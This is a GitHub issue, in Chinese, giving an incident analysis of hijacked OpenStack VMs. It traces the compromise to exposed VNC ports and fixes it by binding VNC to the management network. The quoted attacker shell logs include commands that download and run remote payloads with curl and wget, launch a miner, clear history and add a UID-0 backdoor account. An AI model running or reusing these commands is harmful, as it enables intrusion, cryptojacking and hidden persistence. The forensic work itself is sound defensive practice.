We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
issues 汇总表
黑客登陆虚拟机后进行修改了 root 密码以及将此虚拟机当作肉鸡
服务器上记录了黑客的行为如下
第一台机器日志
18-02-01 22:41:26 ##### root tty1 22:41 #### 2018-02-01 22:41:13 top 18-02-01 22:41:26 ##### root tty1 22:41 #### 2018-02-01 22:41:26 clear 18-02-01 22:41:33 ##### root tty1 22:41 #### 2018-02-01 22:41:33 nvidia-smi 18-02-01 22:41:42 ##### root tty1 22:41 #### 2018-02-01 22:41:42 cd /opt 18-02-01 22:41:42 ##### root tty1 22:41 #### 2018-02-01 22:41:42 ls 18-02-01 22:41:45 ##### root tty1 22:41 #### 2018-02-01 22:41:45 ls -a 18-02-01 22:42:09 ##### root tty1 22:41 #### 2018-02-01 22:41:58 curl 666y.atwebpages.com/yamit.txt -o yamit && chmod +x yamit &&./yamit 18-02-01 22:42:12 ##### root tty1 22:41 #### 2018-02-01 22:42:12 ls 18-02-01 22:42:20 ##### root tty1 22:41 #### 2018-02-01 22:42:20 cat yamit 18-02-01 22:42:29 ##### root tty1 22:41 #### 2018-02-01 22:42:29 histoy -c 18-02-01 22:42:31 ##### root tty1 22:41 #### 18-02-01 22:42:33 ##### root tty1 22:41 #### 2018-02-01 22:42:33 rm -rf yamit 18-02-01 22:42:40 ##### root tty1 22:41 #### 2018-02-01 22:42:35 top 18-02-01 22:42:40 ##### root tty1 22:41 #### 2018-02-01 22:42:40 ear 18-02-01 22:42:42 ##### root tty1 22:41 #### 18-02-01 22:43:09 ##### root tty1 22:43 #### 2018-02-01 22:42:45 exit 18-02-01 22:43:11 ##### root tty1 22:43 #### 2018-02-01 22:43:11 clear 18-02-03 03:56:25 ##### root tty1 03:56 #### 2018-02-01 22:43:12 exit 18-02-03 03:56:28 ##### root tty1 03:56 #### 2018-02-03 03:56:28 ifconfig 18-02-03 03:56:44 ##### root tty1 03:56 #### 2018-02-03 03:56:42 ping ya.ru 18-02-03 03:57:01 ##### root tty1 03:56 #### 2018-02-03 03:57:00 wget https://pastebin.com/raw/BZk9zRE2 18-02-03 03:57:04 ##### root tty1 03:56 #### 2018-02-03 03:57:04 bash B 18-02-03 03:57:31 ##### root tty1 03:56 #### 2018-02-03 03:57:06 bash BZk9zRE2 18-02-03 03:57:38 ##### root tty1 03:56 #### 2018-02-03 03:57:38 rm BZk9zRE2 18-02-03 03:57:42 ##### root tty1 03:56 #### 2018-02-03 03:57:42 history =c
第二台机器日志
18-02-03 12:29:24 ##### root tty1 12:29 #### 2018-02-03 12:29:23 top 18-02-03 12:29:26 ##### root tty1 12:29 #### 2018-02-03 12:29:26 cd /bin 18-02-03 12:29:36 ##### root tty1 12:29 #### 2018-02-03 12:29:34 wget http://222.186.138.64:8899/mine 18-02-03 12:29:40 ##### root tty1 12:29 #### 2018-02-03 12:29:40 chmod 0777 mine 18-02-03 12:29:44 ##### root tty1 12:29 #### 2018-02-03 12:29:44 ./mine & 18-02-03 12:29:55 ##### root tty1 12:29 #### 2018-02-03 12:29:45 top 18-02-03 12:30:01 ##### root tty1 12:29 #### 2018-02-03 12:30:01 useradd -u 0 -g 0 -o myadmin 18-02-03 12:30:10 ##### root tty1 12:29 #### 2018-02-03 12:30:04 passwd myadmin
登陆方式不是通过暴力破解的方式进行登陆此机器,同时看日志看到登陆前有重启虚拟机的行为
根据重启日志,应该是黑客通过某种方式重启 OpenStack 中的虚拟机,目前有以下几种方式
有权限登陆 OpenStack 物理机,在物理机上操作虚拟机[排除--根据操作日志] 有权限登陆 OpenStack dashboard,然后界面上 VNC 操作虚拟机[排除--根据 web 界面重启日志] 使用 VNC 客户端直接操作 OpenStack 中的虚拟机
根据以上方法,确认是以 VNC 客户端直接操作 OpenStack 中的虚拟机导致
计算节点的 VNC 监听端口修改为管理网的 IP
The text was updated successfully, but these errors were encountered:
No branches or pull requests
目录
0 openstack 使用中 issues
issues 汇总表
1 现象
黑客登陆虚拟机后进行修改了 root 密码以及将此虚拟机当作肉鸡
2 分析
服务器上记录了黑客的行为如下
2.1 黑客操作日志
第一台机器日志
第二台机器日志
登陆方式不是通过暴力破解的方式进行登陆此机器,同时看日志看到登陆前有重启虚拟机的行为
2.2 发现端倪
根据重启日志,应该是黑客通过某种方式重启 OpenStack 中的虚拟机,目前有以下几种方式
根据以上方法,确认是以 VNC 客户端直接操作 OpenStack 中的虚拟机导致
3 解决问题
计算节点的 VNC 监听端口修改为管理网的 IP
The text was updated successfully, but these errors were encountered: